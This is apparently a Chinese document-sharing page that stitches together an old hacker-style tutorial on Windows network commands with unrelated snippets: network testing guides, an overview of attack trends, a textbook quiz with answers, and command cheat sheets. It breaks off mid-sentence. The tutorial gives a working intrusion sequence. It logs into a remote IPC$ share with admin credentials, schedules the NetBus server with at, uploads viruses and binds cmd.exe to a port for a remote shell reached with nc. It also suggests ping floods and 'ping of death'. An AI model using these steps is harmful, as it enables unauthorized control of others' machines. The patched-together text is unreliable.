网络攻击常用命令综述

网络攻击常用命令综述

工欲善其事，必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件，相反我很喜欢用它们，但是必须是在知其所以然的情况下使用，才有可能对自身的电脑水平有所帮助)，要进行入侵工作的话，至少(我认为)得装上NT操作系统，以它作为入侵平台，因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然，如果想对UNIX系统动点小手术(网络中的UNIX可始终还是主流呀)而又没钱装UNIX的话，LINUX也极佳

的选择(特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT

配上中文支持是何等麻烦……)，至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等……

然后还得再学点编程语言，至少C与UNIX下的SHELL编程得会一点，能看懂人家写的利用各种漏洞的程序，能对它进行修改，偶尔还能写几个小程序放到网上让大伙儿乐乐，这样玩起来才可能有成就感(其实我自己还不太行，但这多少是个目标)

好了，废话少说，先讲讲一些MS系统里自带的相关网络程序的使用吧。

在MS的操作系统中，与网络安全较有关系的几个命令/程序

是:ping\winipcfg\tracert\net\at\netstat,且待我慢慢道来:

1. ping:这是TCP/IP协议中最有用的命令之一

它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]

[-w timeout] destination-list

Options:

-t Ping the specifed host until interrupted.(除非人为中止，否则一直ping下去)

-a Resolve addresses to hostnames.(把IP转为主机名)

-n count Number of echo requests to send.(响应请求的数量)

-l size Send buffer size.(封包的大小)

-f Set Don't Fragment flag in packet.(信息包中无碎片)

-i TTL Time To Live.(时间)

-v TOS Type Of Service.(服务类型)

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.(较严格的……唉，怎么译好……算了，放着吧)

-w timeout Timeout in milliseconds to wait for each

reply.(timeout的时间)

比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。

其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。

2. winipcfg:

这是用来看自己IP位址的小工具，win98自带，NT里则网络监视器里就能看到IP了，还有个小实用程序叫……好象是叫IPCONFIG吧，没怎么用，都快忘了……这种东东网上其实相当之多，但既然“自带”，又何须外求，何况网上下载的黑客的东东里有没有特洛伊犹未可知，再说了，如果你不是在自己的“爱姬”上运行，岂不是就没法干活?——哈，不好意思，跑题了，但——接着跑两句:可以把一些常用的、经典的工具上传到网上，当作一个备份，什么时候在网吧、某家公司要干活的话，直接下载就是一个完整无缺的工具包了。

这个东东相当简单，直接在DOS下键入命令就是了，没有什么参数。

3. tracert:是验证通往远程主机路径的实用程序

用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

参数:

-d Do not resolve addresses to hostnames.(不将IP转为主机名)

-h maximum_hops Maximum number of hops to search for target.(最大跟踪数量)

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.(time out 的时间)

最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址，你知道该怎么利用它吗?

我略为解释一下吧:跟踪通往210.142.192.130的路由，最大30:

第一行:*&^%&* 我就是从这里出去的(呵，真不想说^&^)

第四行:是不是快要出国了呢?

第九行:呀!这是日本鬼子的地盘……

4. net:这可是个非常棒的东西，如果不会用的话，赶紧睁大眼睛噢

这个命令的语法是: 可用的命令包括:

NET ACCOUNTS NET HELP NET SHARE

NET COMPUTER NET HELPMSG NET START

NET CONFIG NET LOCALGROUP NET STATISTICS

NET CONFIG SERVER NET NAME NET STOP

NET CONFIG WORKSTATION NET PAUSE NET TIME

NET CONTINUE NET PRINT NET USE

NET FILE NET SEND NET USER

NET GROUP NET SESSION NET VIEW

NET HELP SERVICES 列出用户可以启动的网络服务。

NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。

NET HELP command | MORE 用于逐屏显示帮助。

我可就不逐样解释了——这样会把我的手指累坏，就说说常用的两个命令吧

https://www.360docs.net/doc/303014478.html, view

这个命令的语法是:

NET VIEW [\\computername | /DOMAIN[:domainname]]

NET VIEW /NETWORK:NW [\\computername]

NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。

\\computername 指用户希望浏览其共享资源的计算机。

/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名，就会显示局域网络上的所有域。

/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算机名，就会显示NetWare 网络中那个计算机上的可用资源。

至于举例嘛，比如你知道一个远程计算机***.***.**.***上有开资源共享，那么运行net view \\***.***.**.*** 就可以了

https://www.360docs.net/doc/303014478.html, use

这个命令的语法是:NET USE [devicename | *]

[\\computername\sharename[\volume] [password | *]]

[/USER:[domainname\]username]

[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

NET USE 用于将计算机与共享的资源相连接，或者切断计算机与共享资源的连接。当不带选项使用本命令时，它会列出计算机的连接。

devicename 指定一个名字以便与资源相连接，或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输

入一个星号来代替一个指定的设备名可以分配下一个可用设备名。

\\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符，就要将双反斜线 (\\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。

\sharename 指共享资源的网络名字。

\volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。

password 指访问共享资源所需要的密码。

* 进行密码提示。当在密码提示符下输入密码时，密码是不会显示的。

/USER 指定连接时的一个不同的用户名。

domainname 指定另外一个域。如果缺省域，就会使用当前登录的域。

username 指定登录的用户名。

/HOME 将用户与他们的宿主目录相连。

/DELETE 取消一个网络连接，并且从永久连接列表中删除该连接。

/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。

YES 在连接产生时保存它们，并在下次登录时恢复它们。

NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。

PS:前两天在绿色兵团的贴子里见到一位仁兄的话，与这个命令有异曲共工之妙，也说明一个大概:

在浏览器中输入 file:///\\***.***.**.***\c

则网上共享的C盘内容就会显示出来了，就仿佛用浏览器上FTP站点看到的一样。各位不妨试试，还可试试举一反三……

5.at: 排定在特定的日期和时间运行某些命令和程序。

运行 AT 命令之前必须先启动 Schedule 服务。瞧，现炒就得现卖，刚学了net命令，但这个start命令我可没详述，自已看看帮助文件，摸索一下各

种命令的用法吧。

C:\>net start schedule

Schedule 正在启动服务.....

Schedulw 服务启动成功。

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]

AT [\\computername] time [/INTERACTIVE]

[ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。

id 指定给排定进度命令的识别号。

/delete 删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。

/yes 用于删除所有作业，且不想在运行删除时显示确认信息。

time 指定命令运行的时间。

interactive 允许作业在运行时，与用户通过桌面交互。

/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。

如果省略日期，则默认为在每月的本日运行。

/next:date[,...] 指定在下一个指定日期 (如，下周三)，运行命令。

如果省略日期，则默认为在每月的本日运行。

"command" 准备运行的 Windows NT 命令或批处理文件。

知道了如何使用AT，再来看看如何在远程NT上运行ntsrv.exe:

1 利用管理员登陆到目的服务器，方法为: net use

\\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"

2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start

3 利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所

以，你可以用letmein.exe得到服务器的时间，然后:

at \\x.x.x.x 00:00 ntsrv.exe /port:64321

其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动netbus.exe，键入目的服务器得ip地址或hostname，连接!比如第一种方法，你想要在目的服务器运行诸如病毒之类的东东，可以利用netbus得上传功能，将各种“大补丸”上传至目的服务器，再用netbus的"Start program"，键入完整路径，就ok了!第二种方法是利用netbus的“App redirect”功能，启动远程telnet服务，如下:在netbus中击“App redirect”，键入"C:\>winnt\system32\cmd.exe"，Port为:4321，服务就启

动了，然后在本地运行:nc x.x.x.x 4321，出现dos启动的画面就表示连接成功:

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

C:\>

注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^

https://www.360docs.net/doc/303014478.html,stat 这是一个观察网络连接状态的实用工具。

它能检验IP的当前连接状态，在断定你的基本级通信正在进行后，就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话，它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具，是WIN界面的，更加直观而已，并没有多什么功能，这个命令的具体用法如下:

Displays protocol statistics and current TCP/IP network connections.(显示协议与当前网络连接)

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.(显示所有连接和监听端口)

-e Displays Ethernet statistics. This may be combined with the -s

option.(显示以太连接，可以与-s连用)

-n Displays addresses and port numbers in numerical form.(显示地址和端口)

-p proto Shows connections for the protocol specified by proto;

proto

may be TCP or UDP. If used with the -s option to display

per-protocol statistics, proto may be TCP, UDP, or IP.

-r Displays the routing table.

-s Displays per-protocol statistics. By default, statistics are

shown for TCP, UDP and IP; the -p option may be used to specify

a subset of the default.

interval Redisplays selected statistics, pausing interval seconds

between each display. Press CTRL+C to stop redisplaying

statistics. If omitted, netstat will print the current

configuration information once.(interval是设定一个刷新时间，在间隔时间内暂停，按CTRL+C停止……)

这是我在本机未连接网络时运行的，第一列为协议，第二列为本地地址，第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号)，最后一列是状态。这个命令以-n和-a的参数我较常使用-

常用的网络检验命令

常用的网络测试命令 在进行各类网络实验和网络故障排除时，经常需要用到相应的测试工具。网络测试工具基本上分为两类：专用测试工具和系统集成的测试命令，其中，专用测试工具虽然功能强大，但价格较为昂贵，主要用于对网络的专业测试。对于网络实验和平时的网络维护来说，通过熟练掌握由系统（操作系统和网络设备）集成的一些测试命令，就可以判断网络的工作状态和常见的网络故障。我们以Windows XP为例，介绍一些常见命令的使用方法。 1 Ping网络连通测试命令 1.1 Ping命令的功能 Ping是网络连通测试命令，是一种常见的网络工具。用这种工具可以测试端到端的连通性，即检查源端到目的端网络是否通畅。该命令主要是用来检查路由是否能够到达，Ping 的原理很简单，就是通过向计算机发送Internet控制信息协议（ICMP）从源端向目的端发出一定数量的网络包，然后从目的端返回这些包的响应，以校验与远程计算机或本地计算机的连接情况。对于每个发送网络包，Ping最多等待1秒并显示发送和接收网络包的数量，比较每个接收网络包和发送网络包，以校验其有效性。默认情况下，发送四个回应网络包。由于该命令的包长非常小，所以在网上传递的速度非常快，可以快速的检测要去的站点是否可达，如果在一定的时间内收到响应，则程序返回从包发出到收到的时间间隔，这样根据时间间隔就可以统计网络的延迟。如果网络包的响应在一定时间间隔内没有收到，则程序认为包丢失，返回请求超时的结果。这样如果让Ping一次发一定数量的包，然后检查收到相应的包的数量，则可统计出端到端网络的丢包率，而丢包率是检验网络质量的重要参数。 一般在去某一站点是可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功，则可以预测故障出现在以下几个方面：

网络攻击机制和技术发展综述

网络攻击机制和技术发展综述 一、概述 在这个世界上，人类不断研究和发展新的信息安全机制和工程实践，为战胜计算机网络安全威胁付出了艰巨的努力。似乎如果计算机攻击手法不再翻新，关于信息安全的战争将很快结束。虽然，大多数地下组织研究的攻击手法都是惊人的相似，无非就是：蠕虫、后门、rootkits、DoS和sniffer等。但这些手段都体现了它们惊人的威力。到今年，情况愈演愈烈。这几类攻击手段的新变种，与去年前年出现的相比，更加智能化，攻击目标直指互联网基础协议和操作系统层次。从web程序的控制程序到内核级rootkits，黑客的攻击手法不断升级翻新，向用户的信息安全防范能力不断发起挑战。 (注：rootkits, 是一种攻击脚本、经修改的系统程序，或者成套攻击脚本和工具，用于在一个目标系统中非法获取系统的最高控制权限。) 在长期与信息安全专家的较量中，黑客对开发隐蔽的计算机网络攻击技术更加得心应手。同时，这些工具应用起来也越来越简单。以前很多命令行的攻击工具被人写成了GUI(图形界面)的内核级rootkit，将这些高度诡异的攻击武器武装到了那些热中于”玩脚本的菜鸟”手中，这些杀伤力很强的黑客工具，使”脚本菜鸟”们变得象令人敬畏的黑客。 当然，工具本身是不会危及系统安全的-坏事都是人干的。信息安全专业人员也使用和入侵者同样使用的扫描和监听工具，对系统安全做例行公事般地审计。在恶意用户使用前，那些能非法控制web程序的新的渗透测试工具，也被安全人员用来测试系统的漏洞。但是，还有很多的工具有它完全黑暗的一面，比如，蠕虫程序不断发展和传播，它只用来干坏事；反入侵检测工具和很多rootkits专门用来破坏系统的安全性。 本文将探讨一些黑客工具的独创性，以及它们令普通人惊讶的功能。这对帮助用户考虑采用新技术和传统措施来防范这些威胁有很重要的意义:在攻击者攻击来临之前，先检测和修补系统和软件漏洞。 二、Web应用程序：首选目标 日益增长的网络业务应用为脆弱的web应用提供了漏洞滋生的土壤。如银行、政府机构和在线商务企业都使用了web技术提供服务。这些机构往往自己开发整套的web应用程序(ASP、JSP和CGI等)，而这些开发者由于没有获得过专业训练，导致这些自产软件漏洞百出。Web程序的开发者没有意识到，任何传递给浏览器的信息都可能被用户利用和操纵。不管用不用SSL(安全套接层)，恶意用户可以查看、修改或者插入敏感信息（包括价格、会话跟踪信息甚至是脚本执行代码）。攻击者可以通过状态操纵攻击或者SQL代码嵌入等技术危及电子商务网站的安全。 所谓状态操纵攻击(state manipulation), 是指攻击者通过在URL中修改传递给浏览器的敏感信息，隐藏表格元素和cookies，达到非法访问的目的。如果一个安全意识松懈的web开发者，他把数据存储在会话ID中，而没有考虑到价格和余额等关键数据的完整性保护，则攻击者完全可以修改这些数据。再加上如果web程序相信由浏览器传递过来的数据，那么攻击者完全可以窃取用户帐号、修改价格或者修改帐户余额。 所谓SQL代码嵌入(SQL injection)，是指攻击者在普通用户输入中插入数据库查询指令。这些问题相当多情况下是因为输入检验不严格和在错误的代码层中编码引起的，如对逗号”,”和分号”;”等。在这种情况下，攻击者可以对数据库进行查询、修改和删除等操作，在特定情况下，还可以执行系统指令。一般情况下，web网页上的用户名表单往往是这类攻击的入口。如果攻击者使用Proxy server执行这类操作，管理员将很难查到入侵者的来源。而要防止这类攻击，必须在自研软件开发程序上下手整治，形成良好的编程规范和代码检测机制，仅仅靠勤打补丁和安装防火墙是不够的。关于SQL Injection更多的详细信息，请参考：https://www.360docs.net/doc/303014478.html,/article/db/2412.htm

网络安全技术第1章网络安全概述习题及答案

第1章网络安全概述 练习题 1.选择题 （1）在短时间内向网络中的某台服务器发送大量无效连接请求，导致合法用户暂时无法访问服务器的攻击行为是破坏了（ C ）。 A．机密性B．完整性 C．可用性D．可控性 （2）Alice向Bob发送数字签名的消息M，则不正确的说法是( A ) 。 A．Alice可以保证Bob收到消息M B．Alice不能否认发送消息M C．Bob不能编造或改变消息M D．Bob可以验证消息M确实来源于Alice （3）入侵检测系统(IDS，Intrusion Detection System)是对( D )的合理补充，帮助系统对付网络攻击。 A．交换机B．路由器C．服务器D．防火墙（4）根据统计显示，80%的网络攻击源于内部网络，因此，必须加强对内部网络的安全控制和防范。下面的措施中，无助于提高局域网内安全性的措施是( D )。 A．使用防病毒软件B．使用日志审计系统 C．使用入侵检测系统D．使用防火墙防止内部攻击 2. 填空题 （1）网络安全的基本要素主要包括机密性、完整性、可用性、可控性与不可抵赖性。 （2）网络安全是指在分布式网络环境中，对信息载体（处理载体、存储载体、传输载体）和信息的处理、传输、存储、访问提供安全保护，以防止数据、信息内容遭到破坏、更改、泄露，或网络服务中断或拒绝服务或被非授权使用和篡改。 （3）网络钓鱼是近年来兴起的另一种新型网络攻击手段，黑客建立一个网站，通过模仿银行、购物网站、炒股网站、彩票网站等，诱骗用户访问。 （4）防火墙是网络的第一道防线，它是设置在被保护网络和外部网络之间的一道屏障，以防止发生不可预测的、潜在破坏性的入侵， （5）入侵检测是网络的第二道防线，入侵检测是指通过对行为、安全日志或审计数据或其他网络上可以获得的信息进行操作，检测到对系统的闯入或闯入的企图。

网络常用命令提示符(cmd)语句

网络常用命令提示符（cmd）语句 1.最基本，最常用的，测试物理网络的 ping 192.168.10.88 －t ，参数－t是等待用户去中断测试 2.查看DNS、IP、Mac等 A.Win98：winipcfg B.Win2000以上：Ipconfig/all C.NSLOOKUP：如查看河北的DNS C:\>nslookup Default Server: https://www.360docs.net/doc/303014478.html, Address: 202.99.160.68 >server 202.99.41.2 则将DNS改为了41.2 > https://www.360docs.net/doc/303014478.html, Server: https://www.360docs.net/doc/303014478.html, Address: 202.99.160.68 Non-authoritative answer: Name: https://www.360docs.net/doc/303014478.html, Address: 202.99.160.212 3.网络信使 Net send 计算机名/IP|* (广播) 传送内容，注意不能跨网段 net stop messenger 停止信使服务，也可以在面板－服务修改 net start messenger 开始信使服务 4.探测对方对方计算机名，所在的组、域及当前用户名 ping －a IP －t ，只显示NetBios名 nbtstat -a 192.168.10.146 比较全的 https://www.360docs.net/doc/303014478.html,stat -a 显示出你的计算机当前所开放的所有端口 netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等

6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址 arp -a 7.在代理服务器端 捆绑IP和MAC地址，解决局域网内盗用IP： ARP －s 192.168.10.59 00－50－ff－6c－08－75 解除网卡的IP与MAC地址的绑定： arp -d 网卡IP 8.在网络邻居上隐藏你的计算机 net config server /hidden:yes net config server /hidden:no 则为开启 9.几个net命令 A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。 比如：查看这个IP上的共享资源，就可以 C:\>net view 192.168.10.8 在 192.168.10.8 的共享资源 资源共享名类型用途注释 -------------------------------------- 网站服务 Disk 命令成功完成。 B.查看计算机上的用户帐号列表 net user C.查看网络链接 net use 例如：net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘 D.记录链接 net session 例如： C:\>net session 计算机用户名客户类型打开空闲时间

CMD(网络命令大全)

CMD（网络命令大全） CMD（网络命令大全） netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况，常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例：netstat -p tcqip 查看某协议使用情况（查看tcpip 协议使用情况） netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Supporttools文件夹内) kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Supporttools文件夹内) net user 用户名密码add 建立用户 net user guest activeyes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务；(如net start telnet， net start schedule) net stop 服务名停止某服务 net time 目标ip 查看对方时间

常用的网络工具命令解析

如果你玩过路由器的话,就知道路由器里面那些很好玩的命令缩写。 例如,"sh int" 的意思是"show interface"。 现在Windows 2000 也有了类似界面的工具,叫做netsh。 我们在Windows 2000 的cmd shell 下,输入netsh 就出来:netsh> 提示符, 输入int ip 就显示: interface ip> 然后输入dump ,我们就可以看到当前系统的网络配置: # ---------------------------------- # Interface IP Configuration # ---------------------------------- pushd interface ip # Interface IP Configuration for "Local Area Connection" set address name = "Local Area Connection" source = static addr = 192.168.1.168 mask = 255.255.255.0 add address name = "Local Area Connection" addr = 192.1.1.111 mask = 255.255.255.0 set address name = "Local Area Connection" gateway = 192.168.1.100 gwmetric = 1 set dns name = "Local Area Connection" source = static addr = 202.96.209.5 set wins name = "Local Area Connection" source = static addr = none

【实验一】常用网络管理命令的使用

实验1 常用网络管理命令的使用 一．实验目的 1．掌握各种主要命令的作用。 2．掌握各种网络命令的主要测试方法。 3．理解各种网络命令主要参数的含义。 二．实验环境 1．安装有Windows 2003 Server操作系统的计算机二台。 2．至少有两台机器通过交叉双绞线相连或通过集线器相连。 三．实验理论基础 在网络调试的过程中，常常要检测服务器和客户机之间是否连接成功、希望检查本地计算机和某个远程计算机之间的路径、检查TCP/IP的统计情况以及系统使用DHCP分配IP地址时掌握当前所有的TCP/IP网络配置情况，以便及时了解整个网络的运行情况，以确保网络的连通性，保证整个网络的正常运行。在Windows 2003中提供了以下命令行程序。 (1) ping：用于测试计算机之间的连接，这也是网络配置中最常用的命令； (2) ipconfig：用于查看当前计算机的TCP/IP配置； (3) netstat：显示连接统计； (4) tracert：进行源主机与目的主机之间的路由连接分析； (5) arp：实现IP地址到物理地址的单向映射。 四．实验参考步骤 1．Ping命令 Ping用于确定网络的连通性。命令格式为：Ping 主机名/域名/IP地址 一般情况下，用户可以通过使用一系列Ping命令来查找问题出在什么地方，或检验网络运行的情况时。典型的检测次序及对应的可能故障如下： （1）ping 127.0.0.1：如果测试成功，表明网卡、TCP/IP协议的安装、IP地址、子网掩码的设置正常。如果测试不成功，就表示TCP/IP的安装或运行存在某些最基本的问题。 （2）ping 本机IP：如果测试不成功，则表示本地配置或安装存在问题，应当对网络设备和通讯介质进行测试、检查并排除。 （3）ping 局域网内其它IP：如果测试成功，表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码不正确或网卡配置错误或电缆系统有问题。 （4）ping 网关IP：这个命令如果应答正确，表示局域网中的网关或路由器正在运行并能够做出应答。 （5）ping 远程IP：如果收到正确应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet。 （6） ping localhost：localhost是系统的网络保留名，它是127.0.0.1的别名，每台计算机都应该能够将该名字转换成该地址。如果没有做到这点，则表示主机文件（/Windows/host）存在问题。 （7）Ping https://www.360docs.net/doc/303014478.html,（一个著名网站域名）：对此域名执行Ping命令，计算机必须先将域名转换成IP地址，通常是通过DNS服务器。如果这里出现故障，则表示本机DNS服务器的IP地址配置不正确，或DNS服务器有故障。 如果上面所列出的所有Ping命令都能正常运行，那么计算机进行本地和远程通信基本上就

计科13-2 第五组 实验2 网络常用命令使用(学习类别)

宁波工程学院电子与信息工程学院 计算机网络实验实验报告 实验名称实验2 网络常用命令使用 班级计科13-2 组别 5 实验地点逸夫楼511 日期 3.24 一、实验目的： ●使用ipconfig命令查看本机地址、网关地址、DNS服务器地址 ●使用ping命令测试网络（如网关）的连通性 ●使用arp命令查看、修改ARP高速缓存内容 ●使用route命令查看路由表，并解释路由表的主要内容 二、实验内容、要求和环境： （1）任务1：使用ping 命令验证简单TCP/IP 网络的连通性。 ping命令用于验证本地主机计算机或其它网络设备上的TCP/IP 网络层连通性。 使用该命令时，可以用目的IP 地址或限定域名（如https://www.360docs.net/doc/303014478.html,）来测试域名服务(DNS) 功能。本实验只使用IP 地址。 ping操作很简单。源计算机向目的设备发送ICMP 回应请求。目的设备用应答消息做出响应。如果源设备和目的设备之间连接断开，路由器可能会用ICMP 消息做出响应，表示主机未知或目的网络未知。 步骤1：验证本地主机计算机上的TCP/IP 网络层连通性。 C:\> ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address : 172.16.1.2 Subnet Mask : 255.255.0.0 Default Gateway : 172.16.255.254 C:\> 1. 打开Windows 终端，用ipconfig命令确定该主机计算机的IP 地址。 除IP 地址外，输出的其它内容应该与图示相同。如果缺少信息或显示其它子网掩码和默认网关，请重新配置与此主机计算机设置相符的TCP/IP 设置。 2. 记录本地TCP/IP 网络信息的相关信息。

实验报告2 常用网络命令的使用

计算机网络实验报告 班级信工（2）班日期 2016-5-12 学号 20130702047 姓名李格 实验名称常用网络命令的使用 一、实验目的 1. 掌握几种常用的网络命令，通过使用这些命令能检测常见网络故障。 2. 理解各命令的含义，并能解释其显示内容的意义。 二、实验步骤 （一）ping 命令的使用 1、单击开始按钮，输入cmd 并按回车键，进入windows DOS环境。 2、输入ping/? 回车，了解ping命令的基本用法。结果如下： 最常用的ping命令是在ping后面直接跟域名或IP地址。测试内网或外网的联通情况。 3、依次输入以下命令并查看分析结果。 （1）输入ping https://www.360docs.net/doc/303014478.html,并回车查看分析结果。 结果如下：

分析： （2）输入ping 218.197.176.10并回车查看分析结果。结果如下： 分析： （3）输入ping https://www.360docs.net/doc/303014478.html, 并回车查看分析结果。结果如下： 分析： （3）输入pi ng 121.14.1.189 并回车查看分析结果。

结果如下： 分析： 4、使用不同的参数测试ping命令。 结果如下： 分析： （二）ipconfig 命令的使用 1、单击开始按钮，输入cmd 并按回车键，进入windows DOS环境。 2、输入ipconfig/? 回车，了解ipconfig 命令的基本用法。结果如下：

3、依次输入以下命令并查看分析结果。 （1）输入ipconfig 并回车查看并分析结果。结果如下：

分析： （2）输入ipconfig/all 并回车查看分析结果。结果：

网络安全技术第1章网络安全概述习题及答案

网络安全技术第1章网络安全概述习题及答案 -标准化文件发布号：（9456-EUATWK-MWUB-WUNN-INNUL-DDQTY-KII

第1章网络安全概述 练习题 1.选择题 （1）在短时间内向网络中的某台服务器发送大量无效连接请求，导致合法用户暂时无法访问服务器的攻击行为是破坏了（ C ）。 A．机密性B．完整性 C．可用性D．可控性 （2）Alice向Bob发送数字签名的消息M，则不正确的说法是( A ) 。 A．Alice可以保证Bob收到消息M B．Alice不能否认发送消息M C．Bob不能编造或改变消息M D．Bob可以验证消息M确实来源于Alice （3）入侵检测系统(IDS，Intrusion Detection System)是对( D )的合理补充，帮助系统对付网络攻击。 A．交换机B．路由器C．服务器D．防火墙（4）根据统计显示，80%的网络攻击源于内部网络，因此，必须加强对内部网络的安全控制和防范。下面的措施中，无助于提高局域网内安全性的措施是( D )。 A．使用防病毒软件B．使用日志审计系统 C．使用入侵检测系统D．使用防火墙防止内部攻击 2. 填空题 （1）网络安全的基本要素主要包括机密性、完整性、可用性、可控性与不可抵赖性。 （2）网络安全是指在分布式网络环境中，对信息载体（处理载体、存储载体、传输载体）和信息的处理、传输、存储、访问提供安全保护，以防止数据、信息内容遭到破坏、更改、泄露，或网络服务中断或拒绝服务或被非授权使用和篡改。 （3）网络钓鱼是近年来兴起的另一种新型网络攻击手段，黑客建立一个网站，通过模仿银行、购物网站、炒股网站、彩票网站等，诱骗用户访问。

计算机网络常用命令

网络常用命令 1．Ping 命令 Ping 是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，你就可以推断TCP/IP 参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP 配置就是正确的，你必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP 的正确性。 简单的说，Ping 就是一个测试程序，如果Ping 运行正确，你大体上就可以排除网络访问层、网卡、MODEM 的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping 也被某些别有用心的人作为DDOS （拒绝服务攻击）的工具，前段时间Yahoo就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping 数据报而瘫痪的。 按照缺省设置，Windows 上运行的Ping 命令发送 4 个ICMP （网间控制报文协议）回送请求，每个32 字节数据，如果一切正常，你应能得到 4 个回送应答。 Ping 能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping 还能显示TTL （Time To Live 存在时间）值，你可以通过TTL 值推算一下数据包已经通过了多少个路由器：源地点TTL 起始值（就是比返回TTL 略大的一个 2 的乘方数）-返回时TTL 值。例如，返回TTL 值为119，那么可以推算数据报离开源地址的TTL 起始值为128，而源地点到目标地点要通 过9 个路由器网段（128-119）；如果返回TTL 值为246，TTL 起始值就是256，源地点到目标地点要通过9 个路由器网段。 通过Ping 检测网络故障的典型次序 正常情况下，当你使用Ping 命令来查找问题所在或检验网络运行情况时，你需要使用许多Ping 命令，如果所有都运行正确，你就可以相信基本的连通性和配置参数没有问题；如果某些Ping 命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：ping 127.0.0.1-- 这个Ping 命令被送到本地计算机的IP 软件，该命令永不退出该计算机。 如果没有做到这一点，就表示TCP/IP 的安装或运行存在某些最基本的问题。 ping 本机IP--这个命令被送到你计算机所配置的IP 地址，你的计算机始终都应该对该 Ping 